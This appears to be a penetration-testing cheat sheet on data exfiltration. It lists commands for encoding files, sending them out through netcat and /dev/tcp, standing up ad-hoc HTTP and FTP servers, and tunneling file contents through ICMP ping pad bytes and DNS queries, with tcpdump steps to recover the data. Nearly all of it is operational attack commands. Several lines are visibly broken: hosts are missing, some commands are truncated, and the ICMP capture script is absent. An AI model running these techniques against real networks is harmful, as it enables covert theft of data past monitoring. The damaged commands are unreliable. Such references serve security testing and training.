Data Exfiltration and Protocol Tunneling

Exfiltration #

At a Glance #

Data exfiltration, also called data extrusion or data exportation, is the unauthorized transfer of data from a device or network.1

Encoding #

Base64 #

Linux encoding/decoding.

cat filename.ext | base64 -w0
cat filename.ext | base64 -d
  • -w<col>: wrap encoded lines after <col> character (default 76).
  • -d: decode data.

Windows encoding/decoding.

certutil -encode filename.ext output.ext
certutil -decode filename.ext output.ext

Steganography #

Cloakify 2 #

python ./ filename.ext ./ciphers/topWebsites


python ./cloakifyFactory

File Transfer #

wget (recursive) #

wget -r
  • -r: Specify recursive download.

curl #

curl -o filename.ext
  • -o <file>: Write to <file> instead of stdout.

scp #

scp user@ .

nc #

# Receiver
nc -nvlp 1234 > filename.ext
# Sender
nc -nv 1234 < filename.ext
  • n: don’t do DNS lookups.
  • v: prints status messages.
  • l: listen.
  • p <port>: local port used for listening.

/dev/tcp 3 #

# Receiver
nc -nvlp 1234 > filename.ext
# Sender
cat filename.ext > /dev/tcp/
# Sender
nc -w5 -nvlp 1234 < filename.ext
# Receiver
exec 6< /dev/tcp/
cat <&6 > filename.ext

Web Servers #

Python #

python -m SimpleHTTPServer 1234
python3 -m http.server 1234

Simple HTTP Server with File Upload

Ruby #

ruby -run -e httpd . -p1234
ruby -r webrick -e ' => 1234, :DocumentRoot => Dir.pwd).start'

Perl #

perl -MHTTP::Daemon -e '$d = HTTP::Daemon->new(LocalPort => 1234) or  +die $!; while($c = $d->accept){while($r = $c->get_request){+$c->send_file_response(".".$r->url->path)}}'

Note: Install HTTP:Daemon if not present with: sudo cpan HTTP::Daemon


php -S

NodeJS #


npm install -g http-server
http-server -p 1234


npm install -g node-static
static -p 1234

FTP Servers #

Python #

pip install pyftpdlib
python3 -m pyftpdlib -p 1234

NodeJS #

npm install -g ftp-srv
ftp-srv --root ./

Tunneling #


Capture ICMP packets with the following script:

Generate ICMP packets from the file hexdump.

xxd -p -c 8 filename.ext | while read h; do ping -c 1 -p $h; done


  • -p: Output in postscript continuous hexdump style. Also known as plain hexdump style.
  • -c <cols>: Format <cols> octets per line.


  • -c <count>: Stop after sending <count> ECHO_REQUEST packets.
  • -p: You may specify up to 16 “pad” bytes to fill out the packet you send.

Note: Match xxd columns (-c 8) with the data sliced (packet[ICMP].load[-8:]) in the script.


Capture DNS packets data.

sudo tcpdump -n -i wlan0 -w dns_exfil.pcap udp and src and port 53

Note: Remember to point the DNS resolution to where packages are being captured.

Generate DNS queries.

xxd -p -c 16 filename.ext | while read h; do ping -c 1 ${h}; done

Extract exfiltrated data.

tcpdump -r dns-exfil.pcap 2>/dev/null | sed -e 's/.*\ \([A-Za-z0-9+/]*\)*/\1/' | uniq | paste -sd "" - | xxd -r -p

PacketWhisper 4 #

Capture packages with tcpdump, as described above. Cloak, exfiltrate and decloak from the cli.


Further Reading #

  1. “Exfiltration, Tactic TA0010 - Enterprise.” MITRE ATT&CK®,↩︎

  2. TryCatchHCF. “TryCatchHCF/Cloakify: CloakifyFactory.” GitHub,↩︎

  3. “/Dev.” The Linux Documentation Project,↩︎

  4. TryCatchHCF. “PacketWhisper.” GitHub,↩︎